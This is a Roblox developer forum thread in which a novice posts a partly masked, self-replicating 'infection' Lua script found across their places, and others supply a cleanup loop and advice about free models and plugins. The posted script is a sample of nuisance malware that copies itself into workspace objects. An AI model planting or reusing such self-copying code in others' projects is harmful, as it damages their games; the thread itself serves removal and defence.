|
| 18 Apr 2015 03:30 PM |
All of my places, on any account I have, have an infection blue box, with this script Is it going to ruin my games, people are saying it may identify my personal details. I have change a couple of things to x's hoping it wont be copied for bad use, but anyone who scripts will know how to do this.
if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "INfecTION" script.Parent = p end
function check() local list = workspace:XXXXXXXXXX for i = 1, #list do if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end
while true do check() if workspace:findFirstChild("inFECtion") == nil then local main = script.Parent:Clone() main.Name = "XXXXXX" main.Parent = workspace end wait(3) end
|
|
|
| Report Abuse |
|
|
Wittiest
|
  |
| Joined: 02 Mar 2009 |
| Total Posts: 9665 |
|
|
| 18 Apr 2015 03:34 PM |
1. Stop using free models. 2. Run this in your command bar:
for _, v in pairs(game.Workspace:GetChildren()) do if v:IsA('RotateP') then v:Destroy() else for _,v in pairs(v:GetChildren()) do if v:IsA('RotateP') then v:Destroy() end end end end |
|
|
| Report Abuse |
|
|
Wittiest
|
  |
| Joined: 02 Mar 2009 |
| Total Posts: 9665 |
|
|
| 18 Apr 2015 03:36 PM |
| Also, no script will identify your personal details, nor can a script travel from one game to another. |
|
|
| Report Abuse |
|
|
mycheeze
|
  |
| Joined: 27 Jun 2011 |
| Total Posts: 6748 |
|
|
| 18 Apr 2015 03:45 PM |
There's nothing wrong with free models, but next time you insert one, I suggest it isn't in test/build/playsolo mode, that way no scripts are run, then dissect the model to find any hazardous virus scripts.
Not that hard unless you are inserting more than 50+ instances |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 03:51 PM |
| Thank you, I don't use many models and usually I check them before I run anything, I did forget with a cake model, however since I have over 100 places all infected, I cannot see that it has not been able to tranfer from one to another. As I dont put the same things in each place. |
|
|
| Report Abuse |
|
|
mycheeze
|
  |
| Joined: 27 Jun 2011 |
| Total Posts: 6748 |
|
|
| 18 Apr 2015 03:57 PM |
Most scripts that are viruses were made before we had insertservice and so on, and if they wanted to communicate information over, you would have to utilize the http service which is usually disabled, similarly to insertservice and loadstring.
Basically meaning a lot of properties that are set as false (not working) generally prevent sticky situations.
B karefull next time <3 |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:00 PM |
Wittiest, I have copied in the command bar, how do i run it, I hit enter it does nothing. Thanks, I am a real novice at scripts.
|
|
|
| Report Abuse |
|
|
Wittiest
|
  |
| Joined: 02 Mar 2009 |
| Total Posts: 9665 |
|
|
| 18 Apr 2015 04:04 PM |
| When you hit enter, that script checks every instance in workspace, and if it is of the class "RotateP" it destroys it. If the instance is not of the class RotateP, all of the instance's children are checked, and if they are of the class "RotateP" they are destroyed. It is possible the virus has spread beyond workspace, or that there are RotatePs farther in the hierarchy than 2 children. I can't really help without knowing exactly where the RotatePs/infections are. |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:05 PM |
| If it's replicated between your games, that means it's likely plugin based. |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:06 PM |
| mycheeze I dont really know what the last two things you mention are. There is so much to learn on roblox........ |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:07 PM |
| Go to your plugin manager, and remove all suspicious plugins, then run a cleaner script. |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:12 PM |
Thanks KOT that makes sense, I have only just started to use plugins last week. How do I check if it is that. Ill delete most of my plugins. I presume its not harming the games.
|
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:25 PM |
Kot, I presume I just take a cleaner script from library and put it in a game place. The only plugins Ive left are famous ones like cut scene editor, and extra colours.
Wittiest,If I make a you tube vid, would you look at it to see if you can help.
I so appreciate the help I am getting from the roblox community. |
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 04:59 PM |
I need to thank you so much, with all the information, the virus is going. Before if I reverted, it still appeared, now I have run the scripts you both suggested, removed plugins, run a cleaner, and if I revert them back they now go clean. Also they are not immediately reinfected. This will take some time to do them all, but I am so relieved..
|
|
|
| Report Abuse |
|
|
|
| 18 Apr 2015 05:17 PM |
Is this a good idea? Clearing the command bar's history |
|
|
| Report Abuse |
|
|